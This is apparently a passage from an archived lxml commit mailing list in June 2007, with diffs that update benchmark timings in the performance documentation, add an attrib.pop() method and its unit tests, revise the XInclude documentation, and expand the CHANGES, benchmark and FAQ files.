menu_root.getiterator(): tag = el.tag if tag[0] != '{': Modified: lxml/branch/lxml-1.3/doc/performance.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/performance.txt (original) +++ lxml/branch/lxml-1.3/doc/performance.txt Tue Jun 12 18:28:50 2007 @@ -14,21 +14,26 @@ .. _ElementTree: http://effbot.org/zone/element-index.htm .. _cElementTree: http://effbot.org/zone/celementtree.htm -The statements made here are backed by the benchmark script `bench.py`_ that -comes with the lxml source distribution. The timings cited below compare lxml -1.0 (with libxml2 2.6.24), ElementTree 1.2.6 and cElementTree 1.0.5 under -CPython 2.4.2 on a 1.6GHz AMD64 machine. - -.. _`bench.py`: http://codespeak.net/svn/lxml/branch/lxml-1.0/bench.py - -The ``bench.py`` script runs a number of simple tests on the different -libraries, using different XML tree configurations: different tree sizes, with -or without attributes (-/A) and with or without ASCII or unicode text (-/S/U). -In the result extracts cited below, T1 refers to a 3-level tree with many -children at the third level, T2 is swapped around to have many children at the -root element, T3 is a deep tree with few children at each level and T4 is a -small tree, slightly broader than deep. Most benchmarks run in a loop over -all children of the tree root. +The statements made here are backed by the benchmark scripts +`bench_etree.py`_, `bench_xpath.py`_ and `bench_objectify.py`_ that come with +the lxml source distribution. The timings cited below compare lxml 1.3 (with +libxml2 2.6.26) to the ElementTree and cElementTree versions shipped with +CPython 2.5 (based on ElementTree 1.2.6). They were run single-threaded on a +1.8GHz Intel Core Duo machine. + +.. _`bench_etree.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_etree.py +.. _`bench_xpath.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_xpath.py +.. _`bench_objectify.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_objectify.py + +The scripts run a number of simple tests on the different libraries, using +different XML tree configurations: different tree sizes, with or without +attributes (-/A), with or without ASCII or unicode text (-/S/U), and either +against a tree or its serialised form (T/X). In the result extracts cited +below, T1 refers to a 3-level tree with many children at the third level, T2 +is swapped around to have many children at the root element, T3 is a deep tree +with few children at each level and T4 is a small tree, slightly broader than +deep. If repetition is involved, this usually means running the benchmark in +a loop over all children of the tree root. .. contents:: .. @@ -37,6 +42,7 @@ 3 The ElementTree API 4 Tree traversal 5 XPath + 6 lxml.objectify Bad things first @@ -57,45 +63,57 @@ results are rather impressive. Compared to cElementTree, lxml is about 20 to 40 times faster on serialisation:: - lxe: tostring_utf16 (SA T2) 30.9846 msec/pass - cET: tostring_utf16 (SA T2) 715.5002 msec/pass - ET : tostring_utf16 (SA T2) 758.5271 msec/pass - - lxe: tostring_utf16 (U- T3) 3.0509 msec/pass - cET: tostring_utf16 (U- T3) 72.4721 msec/pass - ET : tostring_utf16 (U- T3) 87.0735 msec/pass - - lxe: tostring_utf8 (UA T2) 26.8996 msec/pass - cET: tostring_utf8 (UA T2) 700.4889 msec/pass - ET : tostring_utf8 (UA T2) 745.3317 msec/pass - - lxe: tostring_utf8 (S- T3) 2.1876 msec/pass - cET: tostring_utf8 (S- T3) 71.1290 msec/pass - ET : tostring_utf8 (S- T3) 87.1525 msec/pass + lxe: tostring_utf16 (SATR T1) 21.9206 msec/pass + cET: tostring_utf16 (SATR T1) 461.9428 msec/pass + ET : tostring_utf16 (SATR T1) 486.8946 msec/pass + + lxe: tostring_utf16 (UATR T1) 22.7508 msec/pass + cET: tostring_utf16 (UATR T1) 526.3446 msec/pass + ET : tostring_utf16 (UATR T1) 496.0767 msec/pass + + lxe: tostring_utf16 (S-TR T2) 23.8452 msec/pass + cET: tostring_utf16 (S-TR T2) 537.9200 msec/pass + ET : tostring_utf16 (S-TR T2) 504.4273 msec/pass + + lxe: tostring_utf8 (S-TR T2) 18.2550 msec/pass + cET: tostring_utf8 (S-TR T2) 528.3908 msec/pass + ET : tostring_utf8 (S-TR T2) 549.7071 msec/pass + + lxe: tostring_utf8 (U-TR T3) 2.5497 msec/pass + cET: tostring_utf8 (U-TR T3) 49.8495 msec/pass + ET : tostring_utf8 (U-TR T3) 62.6927 msec/pass For parsing, the difference between the libraries is smaller. The (c)ET libraries use the expat parser, which is known to be extremely fast:: - lxe: parse_stringIO (SA T2) 197.7678 msec/pass - cET: parse_stringIO (SA T2) 38.9390 msec/pass - ET : parse_stringIO (SA T2) 364.3468 msec/pass - - lxe: parse_stringIO (UA T3) 48.6735 msec/pass - cET: parse_stringIO (UA T3) 39.7455 msec/pass - ET : parse_stringIO (UA T3) 237.9971 msec/pass + lxe: parse_stringIO (SAXR T1) 150.2380 msec/pass + cET: parse_stringIO (SAXR T1) 25.9311 msec/pass + ET : parse_stringIO (SAXR T1) 222.9431 msec/pass + + lxe: parse_stringIO (S-XR T3) 5.9490 msec/pass + cET: parse_stringIO (S-XR T3) 5.4519 msec/pass + ET : parse_stringIO (S-XR T3) 76.4120 msec/pass + + lxe: parse_stringIO (UAXR T3) 29.3601 msec/pass + cET: parse_stringIO (UAXR T3) 28.9941 msec/pass + ET : parse_stringIO (UAXR T3) 163.5361 msec/pass The expat parser allows cET to be up to 80% faster than lxml on plain parser -performance. The same applies to the ``iterparse()`` function. However, if -you take a complete serialize-parse cycle, the numbers will look similar to -these:: - - lxe: write_utf8_parse_stringIO (S- T1) 187.0444 msec/pass - cET: write_utf8_parse_stringIO (S- T1) 828.4068 msec/pass - ET : write_utf8_parse_stringIO (S- T1) 1181.0658 msec/pass - - lxe: write_utf8_parse_stringIO (UA T2) 213.6599 msec/pass - cET: write_utf8_parse_stringIO (UA T2) 927.2374 msec/pass - ET : write_utf8_parse_stringIO (UA T2) 1297.9678 msec/pass +performance. Similar timings can be observer for the ``iterparse()`` +function. However, if you take a complete serialize-parse cycle, the numbers +will look similar to these:: + + lxe: write_utf8_parse_stringIO (S-TR T1) 316.6230 msec/pass + cET: write_utf8_parse_stringIO (S-TR T1) 592.1209 msec/pass + ET : write_utf8_parse_stringIO (S-TR T1) 817.9121 msec/pass + + lxe: write_utf8_parse_stringIO (UATR T3) 49.9680 msec/pass + cET: write_utf8_parse_stringIO (UATR T3) 434.6111 msec/pass + ET : write_utf8_parse_stringIO (UATR T3) 574.1441 msec/pass + + lxe: write_utf8_parse_stringIO (SATR T4) 1.2789 msec/pass + cET: write_utf8_parse_stringIO (SATR T4) 12.2640 msec/pass + ET : write_utf8_parse_stringIO (SATR T4) 15.6620 msec/pass For applications that require a high parser throughput and do little serialization, cET is the best choice. Also for iterparse applications that @@ -114,22 +132,20 @@ (given in seconds):: lxe: -- S- U- -A SA UA - T1: 0.1360 0.1214 0.1214 0.1217 0.1232 0.1226 - T2: 0.1258 0.1257 0.1250 0.1348 0.1359 0.1358 - T3: 0.0354 0.0282 0.0288 0.0850 0.0860 0.0862 - T4: 0.0006 0.0006 0.0006 0.0019 0.0018 0.0019 - + T1: 0.1029 0.1005 0.0998 0.1003 0.0998 0.1002 + T2: 0.1035 0.1013 0.1015 0.1090 0.1089 0.1090 + T3: 0.0276 0.0270 0.0273 0.0679 0.0673 0.0673 + T4: 0.0004 0.0004 0.0004 0.0013 0.0013 0.0013 cET: -- S- U- -A SA UA - T1: 0.0417 0.0409 0.0403 0.0410 0.0410 0.0415 - T2: 0.0413 0.0414 0.0413 0.0417 0.0411 0.0417 - T3: 0.0097 0.0100 0.0099 0.0187 0.0142 0.0146 + T1: 0.0277 0.0273 0.0273 0.0272 0.0278 0.0275 + T2: 0.0281 0.0347 0.0281 0.0285 0.0284 0.0284 + T3: 0.0074 0.0074 0.0074 0.0122 0.0102 0.0101 T4: 0.0001 0.0001 0.0001 0.0001 0.0001 0.0001 - ET : -- S- U- -A SA UA - T1: 0.2189 0.2832 0.2210 0.2646 0.2905 0.2214 - T2: 0.3022 0.2322 0.2868 0.3192 0.2290 0.3075 - T3: 0.0519 0.0553 0.0527 0.0601 0.0572 0.0911 - T4: 0.0009 0.0008 0.0008 0.0008 0.0009 0.0009 + T1: 0.1349 0.1962 0.2356 0.1288 0.2642 0.1351 + T2: 0.3104 0.1344 0.3566 0.3857 0.1354 0.4677 + T3: 0.0313 0.0325 0.0312 0.0356 0.3803 0.0364 + T4: 0.0005 0.0005 0.0008 0.0006 0.0007 0.0006 While lxml is still faster than ET in most cases (30-60%), cET can be up to three times faster than lxml here. One of the reasons is that lxml must @@ -141,29 +157,29 @@ Where ET and cET can quickly create a shallow copy of their list of children, lxml has to create a Python object for each child and collect them in a list:: - lxe: root_getchildren (-- T2 ) 6.3981 msec/pass - cET: root_getchildren (-- T2 ) 0.0651 msec/pass - ET : root_getchildren (-- T2 ) 0.0224 msec/pass + lxe: root_getchildren (--TR T2) 0.3500 msec/pass + cET: root_getchildren (--TR T2) 0.0150 msec/pass + ET : root_getchildren (--TR T2) 0.0091 msec/pass As opposed to ET, libxml2 has a notion of documents that each element must be in. This results in a major performance difference for creating independent Elements that end up in independently created documents:: - lxe: create_elements (-- T2 ) 22.0083 msec/pass - cET: create_elements (-- T2 ) 0.3920 msec/pass - ET : create_elements (-- T2 ) 3.0865 msec/pass + lxe: create_elements (--TC T2) 3.7301 msec/pass + cET: create_elements (--TC T2) 0.1960 msec/pass + ET : create_elements (--TC T2) 1.4279 msec/pass Therefore, it is always preferable to create Elements for the document they are supposed to end up in, either as SubElements of an Element or using the explicit ``Element.makeelement()`` call:: - lxe: makeelement (-- T2 ) 4.2658 msec/pass - cET: makeelement (-- T2 ) 0.5658 msec/pass - ET : makeelement (-- T2 ) 3.7136 msec/pass - - lxe: create_subelements (-- T2 ) 3.7640 msec/pass - cET: create_subelements (-- T2 ) 0.5332 msec/pass - ET : create_subelements (-- T2 ) 6.5937 msec/pass + lxe: makeelement (--TC T2) 2.5990 msec/pass + cET: makeelement (--TC T2) 0.3128 msec/pass + ET : makeelement (--TC T2) 1.6940 msec/pass + + lxe: create_subelements (--TC T2) 2.3072 msec/pass + cET: create_subelements (--TC T2) 0.2370 msec/pass + ET : create_subelements (--TC T2) 3.2189 msec/pass So, if the main performance bottleneck of an application is creating large XML trees in memory through calls to Element and SubElement, cET is the best @@ -176,13 +192,13 @@ The following benchmark appends all root children of the second tree to the root of the first tree:: - lxe: append_from_document (-- T1,T2) 11.7905 msec/pass - cET: append_from_document (-- T1,T2) 0.4673 msec/pass - ET : append_from_document (-- T1,T2) 2.0460 msec/pass - - lxe: append_from_document (-- T3,T4) 0.1582 msec/pass - cET: append_from_document (-- T3,T4) 0.0224 msec/pass - ET : append_from_document (-- T3,T4) 0.1618 msec/pass + lxe: append_from_document (--TR T1,T2) 4.3468 msec/pass + cET: append_from_document (--TR T1,T2) 0.2608 msec/pass + ET : append_from_document (--TR T1,T2) 1.2310 msec/pass + + lxe: append_from_document (--TR T3,T4) 0.0679 msec/pass + cET: append_from_document (--TR T3,T4) 0.0148 msec/pass + ET : append_from_document (--TR T3,T4) 0.0880 msec/pass Although these are fairly small numbers compared to parsing, this easily shows the different performance classes for lxml and (c)ET. Where the latter do not @@ -193,26 +209,26 @@ This difference is not always as visible, but applies to most parts of the API, like inserting newly created elements:: - lxe: insert_from_document (-- T1,T2) 16.2342 msec/pass - cET: insert_from_document (-- T1,T2) 1.1786 msec/pass - ET : insert_from_document (-- T1,T2) 3.6107 msec/pass + lxe: insert_from_document (--TR T1,T2) 6.3150 msec/pass + cET: insert_from_document (--TR T1,T2) 0.4039 msec/pass + ET : insert_from_document (--TR T1,T2) 1.4770 msec/pass Or replacing the child slice by a new element:: - lxe: replace_children_element (-- T1 ) 9.1834 msec/pass - cET: replace_children_element (-- T1 ) 0.9731 msec/pass - ET : replace_children_element (-- T1 ) 14.8213 msec/pass + lxe: replace_children_element (--TC T1) 0.2608 msec/pass + cET: replace_children_element (--TC T1) 0.0238 msec/pass + ET : replace_children_element (--TC T1) 0.1628 msec/pass You should keep this difference in mind when you merge very large trees. On the other hand, deep copying a tree is fast in lxml:: - lxe: deepcopy (-- T1 ) 24.7359 msec/pass - cET: deepcopy (-- T1 ) 450.5479 msec/pass - ET : deepcopy (-- T1 ) 717.8308 msec/pass - - lxe: deepcopy (-- T3 ) 2.1182 msec/pass - cET: deepcopy (-- T3 ) 107.2124 msec/pass - ET : deepcopy (-- T3 ) 173.9782 msec/pass + lxe: deepcopy (--TC T1) 10.6010 msec/pass + cET: deepcopy (--TC T1) 220.2251 msec/pass + ET : deepcopy (--TC T1) 463.7730 msec/pass + + lxe: deepcopy (--TC T3) 8.2979 msec/pass + cET: deepcopy (--TC T3) 53.8740 msec/pass + ET : deepcopy (--TC T3) 118.2799 msec/pass So, for example, if you often need to create independent subtrees from a large tree that you have parsed in, lxml is by far the best choice here. @@ -226,39 +242,39 @@ especially if few elements are of interest or the element tag name is known, lxml is a good choice:: - lxe: getiterator_all (-- T2 ) 22.5847 msec/pass - cET: getiterator_all (-- T2 ) 36.8212 msec/pass - ET : getiterator_all (-- T2 ) 46.2846 msec/pass - - lxe: getiterator_islice (-- T2 ) 2.0421 msec/pass - cET: getiterator_islice (-- T2 ) 0.3343 msec/pass - ET : getiterator_islice (-- T2 ) 44.5898 msec/pass - - lxe: getiterator_tag (-- T2 ) 1.9593 msec/pass - cET: getiterator_tag (-- T2 ) 11.7767 msec/pass - ET : getiterator_tag (-- T2 ) 37.5661 msec/pass - - lxe: getiterator_tag_all (-- T2 ) 4.5667 msec/pass - cET: getiterator_tag_all (-- T2 ) 33.5681 msec/pass - ET : getiterator_tag_all (-- T2 ) 37.6200 msec/pass + lxe: getiterator_all (--TR T2) 10.3800 msec/pass + cET: getiterator_all (--TR T2) 28.2831 msec/pass + ET : getiterator_all (--TR T2) 26.0720 msec/pass + + lxe: getiterator_islice (--TR T2) 0.1140 msec/pass + cET: getiterator_islice (--TR T2) 0.2460 msec/pass + ET : getiterator_islice (--TR T2) 26.6550 msec/pass + + lxe: getiterator_tag (--TR T2) 0.3879 msec/pass + cET: getiterator_tag (--TR T2) 9.3720 msec/pass + ET : getiterator_tag (--TR T2) 22.8221 msec/pass + + lxe: getiterator_tag_all (--TR T2) 0.8819 msec/pass + cET: getiterator_tag_all (--TR T2) 27.2939 msec/pass + ET : getiterator_tag_all (--TR T2) 22.8271 msec/pass This similarly shows in ``Element.findall()``:: - lxe: findall (-- T2 ) 26.9907 msec/pass - cET: findall (-- T2 ) 39.1728 msec/pass - ET : findall (-- T2 ) 50.9692 msec/pass - - lxe: findall (-- T3 ) 3.6452 msec/pass - cET: findall (-- T3 ) 12.0210 msec/pass - ET : findall (-- T3 ) 11.2570 msec/pass - - lxe: findall_tag (-- T2 ) 4.6065 msec/pass - cET: findall_tag (-- T2 ) 34.0267 msec/pass - ET : findall_tag (-- T2 ) 36.7813 msec/pass - - lxe: findall_tag (-- T3 ) 0.5884 msec/pass - cET: findall_tag (-- T3 ) 7.6307 msec/pass - ET : findall_tag (-- T3 ) 9.2943 msec/pass + lxe: findall (--TR T2) 10.9370 msec/pass + cET: findall (--TR T2) 28.8639 msec/pass + ET : findall (--TR T2) 27.1060 msec/pass + + lxe: findall (--TR T3) 2.1989 msec/pass + cET: findall (--TR T3) 8.9881 msec/pass + ET : findall (--TR T3) 6.4890 msec/pass + + lxe: findall_tag (--TR T2) 0.9520 msec/pass + cET: findall_tag (--TR T2) 27.2651 msec/pass + ET : findall_tag (--TR T2) 22.7208 msec/pass + + lxe: findall_tag (--TR T3) 0.1700 msec/pass + cET: findall_tag (--TR T3) 6.4540 msec/pass + ET : findall_tag (--TR T3) 5.4770 msec/pass Note that all three libraries currently use the same Python implementation for ``findall()``, except for their native tree iterator. @@ -267,48 +283,52 @@ XPath ----- +The following timings are based on the benchmark script `bench_xpath.py`_. + This part of lxml does not have an equivalent in ElementTree. However, lxml provides more than one way of accessing it and you should take care which part of the lxml API you use. The most straight forward way is to call the ``xpath()`` method on an Element or ElementTree:: - lxe: xpath_method (-- T1) 9.9304 msec/pass - lxe: xpath_method (-- T2) 29.3595 msec/pass - lxe: xpath_method (-- T3) 0.2791 msec/pass - lxe: xpath_method (-- T4) 0.9906 msec/pass + lxe: xpath_method (--TC T1) 1.0180 msec/pass + lxe: xpath_method (--TC T2) 20.3521 msec/pass + lxe: xpath_method (--TC T3) 0.1259 msec/pass + lxe: xpath_method (--TC T4) 1.0169 msec/pass This is well suited for testing and when the XPath expressions are as diverse as the trees they are called on. However, if you have a single XPath expression that you want to apply to a larger number of different elements, the ``XPath`` class is the most efficient way to do it:: - lxe: xpath_class (-- T1) 4.7921 msec/pass - lxe: xpath_class (-- T2) 9.6187 msec/pass - lxe: xpath_class (-- T3) 0.2215 msec/pass - lxe: xpath_class (-- T4) 0.2697 msec/pass + lxe: xpath_class (--TC T1) 0.1891 msec/pass + lxe: xpath_class (--TC T2) 3.0179 msec/pass + lxe: xpath_class (--TC T3) 0.0570 msec/pass + lxe: xpath_class (--TC T4) 0.1910 msec/pass Note that this still allows you to use variables in the expression, so you can parse it once and then adapt it through variables at call time. In other cases, where you have a fixed Element or ElementTree and want to run different expressions on it, you should consider the ``XPathEvaluator``:: - lxe: xpath_element (-- T1) 5.3826 msec/pass - lxe: xpath_element (-- T2) 11.3929 msec/pass - lxe: xpath_element (-- T3) 0.2514 msec/pass - lxe: xpath_element (-- T4) 0.3038 msec/pass + lxe: xpath_element (--TR T1) 0.4089 msec/pass + lxe: xpath_element (--TR T2) 5.9960 msec/pass + lxe: xpath_element (--TR T3) 0.1230 msec/pass + lxe: xpath_element (--TR T4) 0.3440 msec/pass While it looks slightly slower, creating an XPath object for each of the expressions generates a much higher overhead here:: - lxe: xpath_class_repeat (-- T1) 6.8099 msec/pass - lxe: xpath_class_repeat (-- T2) 26.7462 msec/pass - lxe: xpath_class_repeat (-- T3) 0.3126 msec/pass - lxe: xpath_class_repeat (-- T4) 1.1111 msec/pass + lxe: xpath_class_repeat (--TC T1) 1.0259 msec/pass + lxe: xpath_class_repeat (--TC T2) 20.4861 msec/pass + lxe: xpath_class_repeat (--TC T3) 0.1280 msec/pass + lxe: xpath_class_repeat (--TC T4) 1.0269 msec/pass lxml.objectify -------------- +The following timings are based on the benchmark script `bench_objectify.py`_. + Objectify is a data-binding API for XML based on lxml.etree, that was added in version 1.1. It uses standard Python attribute access to traverse the XML tree. It also features ObjectPath, a fast path language based on the same @@ -325,21 +345,21 @@ tree. It avoids step-by-step Python element instantiations along the path, which can substantially improve the access time:: - lxe: attribute (--T T1) 14.8621 msec/pass - lxe: attribute (--T T2) 61.8820 msec/pass - lxe: attribute (--T T4) 14.9317 msec/pass - - lxe: objectpath (--T T1) 13.7311 msec/pass - lxe: objectpath (--T T2) 58.5930 msec/pass - lxe: objectpath (--T T4) 8.0961 msec/pass - - lxe: attributes_deep (--T T1) 81.4488 msec/pass - lxe: attributes_deep (--T T2) 77.0266 msec/pass - lxe: attributes_deep (--T T4) 27.1226 msec/pass - - lxe: objectpath_deep (--T T1) 63.1915 msec/pass - lxe: objectpath_deep (--T T2) 65.2469 msec/pass - lxe: objectpath_deep (--T T4) 11.0138 msec/pass + lxe: attribute (--TR T1) 10.6189 msec/pass + lxe: attribute (--TR T2) 53.7431 msec/pass + lxe: attribute (--TR T4) 10.3359 msec/pass + + lxe: objectpath (--TR T1) 5.8351 msec/pass + lxe: objectpath (--TR T2) 48.1579 msec/pass + lxe: objectpath (--TR T4) 5.6930 msec/pass + + lxe: attributes_deep (--TR T1) 58.7430 msec/pass + lxe: attributes_deep (--TR T2) 63.0901 msec/pass + lxe: attributes_deep (--TR T4) 17.4620 msec/pass + + lxe: objectpath_deep (--TR T1) 52.1719 msec/pass + lxe: objectpath_deep (--TR T2) 52.9201 msec/pass + lxe: objectpath_deep (--TR T4) 7.5650 msec/pass Note, however, that parsing ObjectPath expressions is not for free either, so this is most effective for frequently accessing the same element. @@ -361,13 +381,17 @@ subtrees and elements) to cache, you can trade memory usage against access speed:: - lxe: attribute_cached (--T T1) 10.8343 msec/pass - lxe: attribute_cached (--T T2) 55.5890 msec/pass - lxe: attribute_cached (--T T4) 10.9514 msec/pass - - lxe: attributes_deep_cached (--T T1) 63.7080 msec/pass - lxe: attributes_deep_cached (--T T2) 65.6838 msec/pass - lxe: attributes_deep_cached (--T T4) 15.4514 msec/pass + lxe: attribute_cached (--TR T1) 7.9739 msec/pass + lxe: attribute_cached (--TR T2) 50.9331 msec/pass + lxe: attribute_cached (--TR T4) 7.8540 msec/pass + + lxe: attributes_deep_cached (--TR T1) 51.1391 msec/pass + lxe: attributes_deep_cached (--TR T2) 55.7129 msec/pass + lxe: attributes_deep_cached (--TR T4) 10.7968 msec/pass + + lxe: objectpath_deep_cached (--TR T1) 47.6151 msec/pass + lxe: objectpath_deep_cached (--TR T2) 48.0802 msec/pass + lxe: objectpath_deep_cached (--TR T4) 4.0281 msec/pass Things to note: you cannot currently use ``weakref.WeakKeyDictionary`` objects for this as lxml's element objects do not support weak references (which are Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 18:28:50 2007 @@ -1406,6 +1406,20 @@ for key, value in sequence_or_dict: _setAttributeValue(self._element, key, value) + def pop(self, key, *default): + if python.PyTuple_GET_SIZE(default) > 1: + raise TypeError, "pop expected at most 2 arguments, got %d" % \ + (python.PyTuple_GET_SIZE(default)+1) + result = _getAttributeValue(self._element, key, None) + if result is None: + if python.PyTuple_GET_SIZE(default) == 0: + raise KeyError, key + else: + return python.PyTuple_GET_ITEM(default, 0) + else: + _delAttribute(self._element, key) + return result + # ACCESSORS def __repr__(self): return repr(dict( _attributeIteratorFactory(self._element, 3) )) Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Tue Jun 12 18:28:50 2007 @@ -70,6 +70,39 @@ self.assertEquals("TEST", root.get("attr")) self.assertRaises(TypeError, root.set, "newattr", 5) + def test_attrib_pop(self): + ElementTree = self.etree.ElementTree + + f = StringIO('<doc one="One" two="Two"/>') + doc = ElementTree(file=f) + root = doc.getroot() + self.assertEquals('One', root.attrib['one']) + self.assertEquals('Two', root.attrib['two']) + + self.assertEquals('One', root.attrib.pop('one')) + + self.assertEquals(None, root.attrib.get('one')) + self.assertEquals('Two', root.attrib['two']) + + def test_attrib_pop_unknown(self): + root = self.etree.XML('<doc one="One" two="Two"/>') + self.assertRaises(KeyError, root.attrib.pop, 'NONE') + + self.assertEquals('One', root.attrib['one']) + self.assertEquals('Two', root.attrib['two']) + + def test_attrib_pop_default(self): + root = self.etree.XML('<doc one="One" two="Two"/>') + self.assertEquals('Three', root.attrib.pop('three', 'Three')) + + def test_attrib_pop_empty_default(self): + root = self.etree.XML('<doc/>') + self.assertEquals('Three', root.attrib.pop('three', 'Three')) + + def test_attrib_pop_invalid_args(self): + root = self.etree.XML('<doc one="One" two="Two"/>') + self.assertRaises(TypeError, root.attrib.pop, 'One', None, None) + def test_pi(self): # lxml.etree separates target and text Element = self.etree.Element From scoder at codespeak.net Tue Jun 12 18:38:31 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:38:31 +0200 (CEST) Subject: [Lxml-checkins] r44179 - lxml/branch/lxml-1.3/doc Message-ID: <20070612163831.E0F23818F@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:38:31 2007 New Revision: 44179 Modified: lxml/branch/lxml-1.3/doc/api.txt Log: merged in XInclude doc update from trunk Modified: lxml/branch/lxml-1.3/doc/api.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/api.txt (original) +++ lxml/branch/lxml-1.3/doc/api.txt Tue Jun 12 18:38:31 2007 @@ -32,7 +32,7 @@ 4 Iteration 5 Error handling on exceptions 6 Serialisation - 7 xinclude + 7 XInclude and ElementInclude 8 write_c14n on ElementTree @@ -257,11 +257,11 @@ .. _`Unicode support`: parsing.html#python-unicode-strings -XInclude --------- +XInclude and ElementInclude +--------------------------- -Simple XInclude support exists. You can let lxml process xinclude statements -in a document by calling the xinclude() method on a tree:: +You can let lxml process xinclude statements in a document by calling the +xinclude() method on a tree:: >>> data = StringIO('''\ ... <doc xmlns:xi="http://www.w3.org/2001/XInclude"> @@ -271,8 +271,19 @@ >>> tree = etree.parse(data) >>> tree.xinclude() - >>> etree.tostring(tree.getroot()) - '<doc xmlns:xi="http://www.w3.org/2001/XInclude">\n<foo/>\n<a xml:base="doc/test.xml"/>\n</doc>' + >>> print etree.tostring(tree.getroot()) + <doc xmlns:xi="http://www.w3.org/2001/XInclude"> + <foo/> + <a xml:base="doc/test.xml"/> + </doc> + +Note that the ElementTree compatible ElementInclude_ module is also supported +as ``lxml.ElementInclude``. It has the additional advantage of supporting +custom `URL resolvers`_ at the Python level. The normal XInclude mechanism +cannot deploy these. If you need ElementTree compatibility or custom +resolvers, you have to stick to the external Python module. + +.. _ElementInclude: http://effbot.org/zone/element-xinclude.htm write_c14n on ElementTree From scoder at codespeak.net Tue Jun 12 18:53:58 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:53:58 +0200 (CEST) Subject: [Lxml-checkins] r44180 - in lxml/branch/lxml-1.3: . benchmark doc src/lxml src/lxml/tests Message-ID: <20070612165358.4B3308194@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:53:57 2007 New Revision: 44180 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/benchmark/bench_etree.py lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/build.txt lxml/branch/lxml-1.3/doc/performance.txt lxml/branch/lxml-1.3/doc/sax.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/sax.py lxml/branch/lxml-1.3/src/lxml/serializer.pxi lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py lxml/branch/lxml-1.3/src/lxml/tests/test_sax.py Log: merged in revs up to 42695 from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 18:53:57 2007 @@ -8,17 +8,25 @@ Features added -------------- +* ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support + adding processing instructions and comments around the root node + * Element.attrib now has a ``pop()`` method -* Support for custom Element class instantiation in lxml.sax +* Support for custom Element class instantiation in lxml.sax: passing a + ``makeelement()`` function to the ElementTreeContentHandler will reuse the + lookup context of that function * '.' represents empty ObjectPath (identity) -* ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` - Bugs fixed ---------- +* Documents lost their top-level PIs and comments on serialisation + +* lxml.sax failed on comments and PIs. Comments are now properly ignored and + PIs are copied. + * Raise AssertionError when passing strings containing '\0' bytes Modified: lxml/branch/lxml-1.3/benchmark/bench_etree.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_etree.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_etree.py Tue Jun 12 18:53:57 2007 @@ -18,6 +18,19 @@ for child in reversed(root): pass + def bench_first_child(self, root): + for i in range(1000): + child = root[0] + + def bench_last_child(self, root): + for i in range(1000): + child = root[-1] + + def bench_middle_child(self, root): + pos = len(root) / 2 + for i in range(1000): + child = root[pos] + @with_attributes(True, False) @with_text(text=True, utext=True) def bench_tostring_utf8(self, root): Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 12 18:53:57 2007 @@ -1,6 +1,6 @@ -========================== -Frequently Asked Questions -========================== +================================ +Frequently Asked Questions (FAQ) +================================ See also the notes on compatibility_ to ElementTree_. @@ -15,25 +15,28 @@ 1.3 What standards does lxml implement? 1.4 Where are the Windows binaries? 1.5 What is the difference between lxml.etree and lxml.objectify? - 1.6 Why is my application so slow? + 1.6 How can I make my application run faster? 1.7 Why do I get errors about missing UCS4 symbols when installing lxml? - 2 Bugs - 2.1 My application crashes! Why does lxml.etree do that? - 2.2 I think I have found a bug in lxml. What should I do? - 3 Threading - 3.1 Can I use threads to concurrently access the lxml API? - 3.2 Does my program run faster if I use threads? - 3.3 Would my single-threaded program run faster if I turned off threading? - 4 Parsing and Serialisation - 4.1 Why doesn't the ``pretty_print`` option reformat my XML output? - 4.2 Why can't lxml parse my XML from unicode strings? - 4.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? - 4.4 Why can't I just delete parents or clear the root node in iterparse()? - 5 XPath and Document Traversal - 5.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? - 5.2 Why doesn't ``findall()`` support full XPath expressions? - 5.3 How can I find out which namespace prefixes are used in a document? - 5.4 How can I specify a default namespace for XPath expressions? + 2 Contributing + 2.1 Why is lxml not written in Python? + 2.2 How can I contribute? + 3 Bugs + 3.1 My application crashes! Why does lxml.etree do that? + 3.2 I think I have found a bug in lxml. What should I do? + 4 Threading + 4.1 Can I use threads to concurrently access the lxml API? + 4.2 Does my program run faster if I use threads? + 4.3 Would my single-threaded program run faster if I turned off threading? + 5 Parsing and Serialisation + 5.1 Why doesn't the ``pretty_print`` option reformat my XML output? + 5.2 Why can't lxml parse my XML from unicode strings? + 5.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? + 5.4 Why can't I just delete parents or clear the root node in iterparse()? + 6 XPath and Document Traversal + 6.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? + 6.2 Why doesn't ``findall()`` support full XPath expressions? + 6.3 How can I find out which namespace prefixes are used in a document? + 6.4 How can I specify a default namespace for XPath expressions? General Questions 